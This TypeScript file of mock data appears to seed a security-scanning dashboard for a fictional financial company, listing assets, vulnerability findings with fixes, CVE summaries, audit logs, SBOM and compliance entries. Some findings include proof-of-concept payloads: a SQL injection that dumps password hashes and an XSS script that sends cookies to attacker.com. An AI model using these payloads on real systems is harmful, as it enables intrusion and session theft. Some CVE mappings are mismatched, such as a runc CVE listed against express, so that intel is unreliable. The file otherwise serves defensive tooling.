import type { Asset, Vulnerability, Tenant, AuditLog, NvdVulnIntel, SbomPackage, ComplianceRequirement } from '../types';

export const MOCK_TENANTS: Tenant[] = [
  {
    id: 'tenant-acme-corp-01',
    name: 'Acme Financial Security Inc.',
    domain: 'acmefinancial.com',
    industry: 'FinTech & Banking Services',
    plan: 'Enterprise MSSP',
    securityScore: 82,
    previousScore: 76,
    assetsCount: 14,
    totalVulns: 28,
    openCriticals: 3,
  },
];

export const INITIAL_TENANT: Tenant = MOCK_TENANTS[0];

export const INITIAL_ASSETS: Asset[] = [
  {
    id: 'ast-01',
    name: 'Customer Portal Web Application',
    target: 'https://portal.acmefinancial.com',
    type: 'web',
    owner: 'AppSec Team / Sarah Connor',
    techStack: ['React', 'Node.js', 'Express', 'PostgreSQL', 'Nginx'],
    criticality: 'critical',
    lastScanDate: '2026-08-04 14:30',
    vulnerabilityCounts: { critical: 1, high: 2, medium: 3, low: 1 },
    status: 'active',
  },
  {
    id: 'ast-02',
    name: 'Core Payment Gateway API',
    target: 'https://api.acmefinancial.com/v2/payments',
    type: 'api',
    owner: 'DevOps / Mark Redfield',
    techStack: ['Go', 'gRPC', 'Kong Gateway', 'Redis'],
    criticality: 'critical',
    lastScanDate: '2026-08-05 09:15',
    vulnerabilityCounts: { critical: 1, high: 1, medium: 1, low: 0 },
    status: 'active',
  },
  {
    id: 'ast-03',
    name: 'Primary DMZ Edge Router & Server',
    target: '198.51.100.45',
    type: 'infrastructure',
    owner: 'Infra Sec / Alex Vance',
    techStack: ['Ubuntu 22.04 LTS', 'OpenSSH 8.9', 'Docker 24.0.5'],
    criticality: 'high',
    lastScanDate: '2026-08-03 11:00',
    vulnerabilityCounts: { critical: 1, high: 0, medium: 2, low: 2 },
    status: 'active',
  },
  {
    id: 'ast-04',
    name: 'AWS Cloud Production Infrastructure',
    target: 'aws://us-east-1:account-98421034',
    type: 'cloud',
    owner: 'Cloud Sec / CloudOps',
    techStack: ['AWS S3', 'AWS EKS', 'AWS IAM', 'RDS Aurora'],
    criticality: 'high',
    lastScanDate: '2026-08-05 12:00',
    vulnerabilityCounts: { critical: 0, high: 2, medium: 4, low: 1 },
    status: 'active',
  },
  {
    id: 'ast-05',
    name: 'Mobile Banking iOS & Android API Endpoint',
    target: 'https://mobile-gw.acmefinancial.com',
    type: 'api',
    owner: 'Mobile Engineering',
    techStack: ['GraphQL', 'Java Spring Boot', 'OAuth 2.0'],
    criticality: 'medium',
    lastScanDate: '2026-08-01 16:45',
    vulnerabilityCounts: { critical: 0, high: 1, medium: 2, low: 3 },
    status: 'active',
  },
];

export const INITIAL_VULNERABILITIES: Vulnerability[] = [
  {
    id: 'vuln-101',
    cveId: 'CVE-2024-3094',
    cweId: 'CWE-506',
    title: 'XZ Utils Malicious Backdoor Identified in SSH Subsystem',
    severity: 'critical',
    cvssScore: 10.0,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H',
    assetId: 'ast-03',
    assetName: 'Primary DMZ Edge Router & Server',
    category: 'infrastructure',
    owaspCategory: 'A06:2021-Vulnerable and Outdated Components',
    mitreTechnique: 'T1190 - Exploit Public-Facing Application',
    status: 'new',
    assignedTo: 'Alex Vance (Infra Sec)',
    discoveredDate: '2026-08-05 10:15',
    remediationDeadline: '2026-08-06 10:15 (24h SLA)',
    affectedUrlOrPort: '198.51.100.45:22 (SSH)',
    description: 'A malicious backdoor was detected in liblzma / xz-utils library (versions 5.6.0 and 5.6.1). Under specific conditions, this backdoor allows unauthenticated remote attackers to execute arbitrary system commands via crafted SSH authentication requests.',
    proofOfConcept: 'SSH handshake inspection revealed patched liblzma signature hooks in systemd-sshd process daemon.',
    technicalRecommendation: 'Immediately downgrade xz-utils to version 5.4.x or upgrade to verified clean package version 5.6.2+. Restart sshd service and audit all authorized SSH keys.',
    executiveSummary: 'A critical supply-chain backdoor in system libraries could allow unauthorized hackers to gain full root command control over our primary network edge server.',
    attackScenario: 'An external attacker sends a specifically obfuscated RSA payload during an SSH connection negotiation, triggering execution of unauthorized root shell commands.',
    codeFixSnippet: `# Emergency Remediation Script for Ubuntu/Debian
apt-get update
apt-get install --only-upgrade xz-utils liblzma5
systemctl restart sshd
# Verify clean version:
xz --version | grep -v '5.6.0\\|5.6.1'`,
  },
  {
    id: 'vuln-102',
    cveId: 'CVE-2023-34362',
    cweId: 'CWE-89',
    title: 'SQL Injection Vulnerability in User Search Endpoint',
    severity: 'critical',
    cvssScore: 9.8,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H',
    assetId: 'ast-01',
    assetName: 'Customer Portal Web Application',
    category: 'owasp',
    owaspCategory: 'A03:2021-Injection',
    mitreTechnique: 'T1190 - Exploit Public-Facing Application',
    status: 'assigned',
    assignedTo: 'Sarah Connor (AppSec Lead)',
    discoveredDate: '2026-08-04 14:35',
    remediationDeadline: '2026-08-06 14:35 (24h SLA)',
    affectedUrlOrPort: 'https://portal.acmefinancial.com/api/users/search?query=',
    description: 'The search input parameter `query` is dynamically concatenated directly into a SQL query string without parameterized prepared statements, allowing SQL syntax injection.',
    proofOfConcept: "GET /api/users/search?query=admin' UNION SELECT 1,username,password_hash,email FROM users--",
    technicalRecommendation: 'Refactor database interaction to use parameterized ORM bindings or prepared statements. Enforce strict input validation using whitelist regex.',
    executiveSummary: 'An unauthenticated visitor can query sensitive user financial records and password hashes directly from our database by submitting manipulated search requests.',
    attackScenario: 'Attacker injects UNION SELECT statements into search field, dumping full database schemas including customer PII and hashes.',
    codeFixSnippet: `// INSECURE (Current):
// const result = await db.query(\`SELECT * FROM users WHERE name LIKE '%\${req.query.query}%'\`);

// SECURE (Fixed):
const searchQuery = \`%\${req.query.query}%\`;
const result = await db.query(
  'SELECT id, name, email FROM users WHERE name ILIKE $1',
  [searchQuery]
);`,
  },
  {
    id: 'vuln-103',
    cveId: 'N/A',
    cweId: 'CWE-79',
    title: 'Stored Cross-Site Scripting (XSS) in Comment Section',
    severity: 'high',
    cvssScore: 7.5,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N',
    assetId: 'ast-01',
    assetName: 'Customer Portal Web Application',
    category: 'owasp',
    owaspCategory: 'A03:2021-Injection',
    mitreTechnique: 'T1059.007 - JavaScript Execution',
    status: 'in_progress',
    assignedTo: 'Frontend Team / Dev',
    discoveredDate: '2026-08-04 15:00',
    remediationDeadline: '2026-08-08 15:00',
    affectedUrlOrPort: 'https://portal.acmefinancial.com/tickets/comments',
    description: 'Customer ticket support comment payloads are rendered into the admin dashboard DOM using `dangerouslySetInnerHTML` without DOM sanitization.',
    proofOfConcept: 'Submitted comment: `<script>fetch("https://attacker.com/steal?"+document.cookie)</script>` executed upon admin view.',
    technicalRecommendation: 'Implement DOMPurify sanitization before rendering HTML strings, or render text strictly as standard React JSX text nodes.',
    executiveSummary: 'A malicious user can post a support comment containing hidden JavaScript that steals administrative session cookies when viewed by support staff.',
    attackScenario: 'Attacker submits ticket with script payload. Support agent opens ticket, script executes silently, transferring admin session token to attacker.',
    codeFixSnippet: `// SECURE FIX with DOMPurify:
import DOMPurify from 'dompurify';

function CommentBody({ rawHtml }: { rawHtml: string }) {
  const cleanHtml = DOMPurify.sanitize(rawHtml, { USE_PROFILES: { html: true } });
  return <div dangerouslySetInnerHTML={{ __html: cleanHtml }} />;
}`,
  },
  {
    id: 'vuln-104',
    cveId: 'N/A',
    cweId: 'CWE-16',
    title: 'Publicly Accessible AWS S3 Bucket containing Financial Artifacts',
    severity: 'high',
    cvssScore: 8.6,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N',
    assetId: 'ast-04',
    assetName: 'AWS Cloud Production Infrastructure',
    category: 'cloud',
    owaspCategory: 'A05:2021-Security Misconfiguration',
    mitreTechnique: 'T1530 - Data from Cloud Storage',
    status: 'new',
    assignedTo: 'Cloud Sec / CloudOps',
    discoveredDate: '2026-08-05 11:30',
    remediationDeadline: '2026-08-07 11:30',
    affectedUrlOrPort: 's3://acme-financial-public-exports-prod',
    description: 'S3 Bucket policy contains `s3:GetObject` permission granted to Principal `*` without IP or VPC endpoint restrictions.',
    proofOfConcept: 'curl -I https://acme-financial-public-exports-prod.s3.amazonaws.com/daily_export_2026.csv returned HTTP 200 OK.',
    technicalRecommendation: 'Enable AWS S3 Block Public Access at account and bucket level. Enforce IAM SSE-KMS encryption and Bucket Policy restricting access to VPC Endpoints.',
    executiveSummary: 'An Amazon S3 storage bucket containing exported financial reports is publicly accessible to anyone on the Internet without authentication.',
    attackScenario: 'Automated internet scanner scans public S3 naming patterns, discovers bucket, and downloads full CSV customer ledgers.',
    codeFixSnippet: `# AWS CLI Remediation Command:
aws s3api put-public-access-block \\
  --bucket acme-financial-public-exports-prod \\
  --public-access-block-configuration "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"`,
  },
  {
    id: 'vuln-105',
    cveId: 'N/A',
    cweId: 'CWE-693',
    title: 'Missing Essential HTTP Security Headers (HSTS, CSP, X-Frame-Options)',
    severity: 'medium',
    cvssScore: 5.3,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N',
    assetId: 'ast-01',
    assetName: 'Customer Portal Web Application',
    category: 'owasp',
    owaspCategory: 'A05:2021-Security Misconfiguration',
    mitreTechnique: 'T1189 - Drive-by Compromise',
    status: 'fixed',
    assignedTo: 'AppSec Team',
    discoveredDate: '2026-08-02 09:00',
    remediationDeadline: '2026-08-10 09:00',
    affectedUrlOrPort: 'https://portal.acmefinancial.com',
    description: 'HTTP response lacks Strict-Transport-Security (HSTS), Content-Security-Policy (CSP), and X-Frame-Options headers.',
    proofOfConcept: 'Header inspection shows missing CSP and HSTS.',
    technicalRecommendation: 'Add security headers via Nginx or Express helmet middleware.',
    executiveSummary: 'Missing security headers leave the application vulnerable to clickjacking and downgrade attack vectors.',
    attackScenario: 'An attacker embeds our login portal into an iframe on a rogue site to perform clickjacking token theft.',
    codeFixSnippet: `// Express Helmet Middleware Fix:
import helmet from 'helmet';
app.use(helmet({
  contentSecurityPolicy: { directives: { defaultSrc: ["'self'"] } },
  hsts: { maxAge: 31536000, includeSubDomains: true }
}));`,
  },
];

export const INITIAL_NVD_INTEL: NvdVulnIntel[] = [
  {
    cveId: 'CVE-2024-3094',
    title: 'XZ Utils Supply Chain Backdoor',
    severity: 'critical',
    cvssScore: 10.0,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H',
    cwe: 'CWE-506 (Embedded Malicious Code)',
    owasp: 'A06:2021-Vulnerable and Outdated Components',
    publishedDate: '2024-03-29',
    description: 'Malicious code inserted into xz-utils versions 5.6.0 and 5.6.1 during build script generation, resulting in SSH authentication payload hijacking.',
    affectedSoftware: ['liblzma 5.6.0', 'liblzma 5.6.1', 'Fedora 40', 'Debian Testing'],
    references: ['https://nvd.nist.gov/vuln/detail/CVE-2024-3094', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3094'],
    mitreTechnique: 'T1190 - Exploit Public-Facing Application',
  },
  {
    cveId: 'CVE-2023-34362',
    title: 'MOVEit Transfer SQL Injection Lead to Remote Code Execution',
    severity: 'critical',
    cvssScore: 9.8,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H',
    cwe: 'CWE-89 (SQL Injection)',
    owasp: 'A03:2021-Injection',
    publishedDate: '2023-05-31',
    description: 'SQL injection vulnerability in MOVEit Transfer web interface allows unauthenticated remote attacker to gain access to database and execute arbitrary code.',
    affectedSoftware: ['MOVEit Transfer < 2023.0.1'],
    references: ['https://nvd.nist.gov/vuln/detail/CVE-2023-34362'],
    mitreTechnique: 'T1190 - Exploit Public-Facing Application',
  },
  {
    cveId: 'CVE-2024-21626',
    title: 'runc Container Escape via File Descriptor Leak',
    severity: 'high',
    cvssScore: 8.6,
    cvssVector: 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H',
    cwe: 'CWE-403 (Exposure of File Descriptor)',
    owasp: 'A05:2021-Security Misconfiguration',
    publishedDate: '2024-01-31',
    description: 'In runc 1.1.11 and earlier, an attacker inside a container can break out of container isolation via leaked file descriptors during container exec.',
    affectedSoftware: ['runc <= 1.1.11', 'Docker Desktop', 'Kubernetes Kubelet'],
    references: ['https://nvd.nist.gov/vuln/detail/CVE-2024-21626'],
    mitreTechnique: 'T1611 - Escape to Host',
  },
  {
    cveId: 'CVE-2023-4863',
    title: 'Heap Buffer Overflow in libwebp Image Rendering',
    severity: 'critical',
    cvssScore: 9.1,
    cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H',
    cwe: 'CWE-122 (Heap-based Buffer Overflow)',
    owasp: 'A06:2021-Vulnerable Components',
    publishedDate: '2023-09-12',
    description: 'Heap buffer overflow in WebP image processing library allows remote attackers to execute arbitrary code via crafted WebP images.',
    affectedSoftware: ['libwebp < 1.3.2', 'Google Chrome', 'Firefox', 'Electron'],
    references: ['https://nvd.nist.gov/vuln/detail/CVE-2023-4863'],
    mitreTechnique: 'T1203 - Exploitation for Client Execution',
  },
];

export const INITIAL_AUDIT_LOGS: AuditLog[] = [
  {
    id: 'log-901',
    timestamp: '2026-08-05 14:15:02',
    user: 'sarah.connor@acmefinancial.com',
    role: 'Security Analyst',
    action: 'SCAN_STARTED',
    details: 'Initiated OWASP Active Scan on target https://portal.acmefinancial.com (Scope Auth Signed)',
    ip: '198.51.100.12',
    status: 'SUCCESS',
  },
  {
    id: 'log-902',
    timestamp: '2026-08-05 13:45:10',
    user: 'alex.vance@acmefinancial.com',
    role: 'Super Admin',
    action: 'VULN_STATUS_CHANGE',
    details: 'Updated vulnerability vuln-101 (XZ Utils) status to ASSIGNED -> SLA: 24 Hours',
    ip: '198.51.100.45',
    status: 'SUCCESS',
  },
  {
    id: 'log-903',
    timestamp: '2026-08-05 12:10:00',
    user: 'ai.analyst.bot@vulnwiz.internal',
    role: 'Security Analyst',
    action: 'AI_REMEDIATION_GENERATE',
    details: 'Generated technical and executive summary report for CVE-2023-34362 SQL Injection',
    ip: '10.0.4.88',
    status: 'SUCCESS',
  },
  {
    id: 'log-904',
    timestamp: '2026-08-05 11:00:22',
    user: 'mark.redfield@acmefinancial.com',
    role: 'Developer',
    action: 'ASSET_CREATED',
    details: 'Created asset: Core Payment Gateway API (https://api.acmefinancial.com/v2/payments)',
    ip: '198.51.100.18',
    status: 'SUCCESS',
  },
  {
    id: 'log-905',
    timestamp: '2026-08-05 09:30:11',
    user: 'unknown.user@external.org',
    role: 'Executive Viewer',
    action: 'UNAUTHORIZED_SCOPE_REQUEST',
    details: 'Attempted scan execution against unauthorized domain google.com (Blocked by Scope Guard)',
    ip: '45.33.21.90',
    status: 'DENIED',
  },
];

export const INITIAL_SBOM_PACKAGES: SbomPackage[] = [
  {
    id: 'sbom-01',
    name: 'xz-utils / liblzma',
    version: '5.6.0',
    fixedVersion: '5.6.2+',
    ecosystem: 'System (dpkg/rpm)',
    license: 'GPL-2.0-or-later',
    assetName: 'Primary DMZ Edge Router & Server',
    cveId: 'CVE-2024-3094',
    severity: 'critical',
    status: 'vulnerable',
  },
  {
    id: 'sbom-02',
    name: 'express',
    version: '4.17.1',
    fixedVersion: '4.19.2+',
    ecosystem: 'npm',
    license: 'MIT',
    assetName: 'Customer Portal Web Application',
    cveId: 'CVE-2024-21626',
    severity: 'high',
    status: 'patch_available',
  },
  {
    id: 'sbom-03',
    name: 'dompurify',
    version: '3.0.8',
    ecosystem: 'npm',
    license: 'Apache-2.0',
    assetName: 'Customer Portal Web Application',
    severity: 'none',
    status: 'secure',
  },
  {
    id: 'sbom-04',
    name: 'gorgonite / grpc-go',
    version: '1.58.0',
    ecosystem: 'Go',
    license: 'BSD-3-Clause',
    assetName: 'Core Payment Gateway API',
    severity: 'none',
    status: 'secure',
  },
  {
    id: 'sbom-05',
    name: 'org.springframework.boot:spring-boot',
    version: '3.1.2',
    fixedVersion: '3.1.5+',
    ecosystem: 'Maven',
    license: 'Apache-2.0',
    assetName: 'Mobile Banking API Endpoint',
    severity: 'medium',
    status: 'patch_available',
  },
];

export const INITIAL_COMPLIANCE_REQUIREMENTS: ComplianceRequirement[] = [
  {
    id: 'comp-01',
    standard: 'PCI-DSS v4.0',
    controlId: 'Requirement 6.3.1',
    controlTitle: 'Security Vulnerabilities Identification and Patching',
    description: 'Bespoke and custom software must be protected against security vulnerabilities by identifying and patching high-risk vulns within 30 days (24h for criticals).',
    status: 'FAILED',
    relatedVulnCount: 2,
  },
  {
    id: 'comp-02',
    standard: 'SOC 2 Type II',
    controlId: 'CC6.8',
    controlTitle: 'Prevention of Unauthorized & Malicious Code',
    description: 'Controls are implemented to prevent or detect the introduction of unauthorized or malicious software across corporate endpoints and servers.',
    status: 'FAILED',
    relatedVulnCount: 1,
  },
  {
    id: 'comp-03',
    standard: 'ISO 27001:2022',
    controlId: 'Control A.8.8',
    controlTitle: 'Management of Technical Vulnerabilities',
    description: 'Information about technical vulnerabilities of information systems in use shall be obtained, exposure evaluated, and appropriate measures taken.',
    status: 'PASSED',
    relatedVulnCount: 0,
  },
  {
    id: 'comp-04',
    standard: 'HIPAA Security Rule',
    controlId: '164.308(a)(1)(ii)(A)',
    controlTitle: 'Risk Analysis & Vulnerability Monitoring',
    description: 'Conduct an accurate and thorough assessment of the potential risks and vulnerabilities to the confidentiality, integrity, and availability of ePHI.',
    status: 'PASSED',
    relatedVulnCount: 0,
  },
];
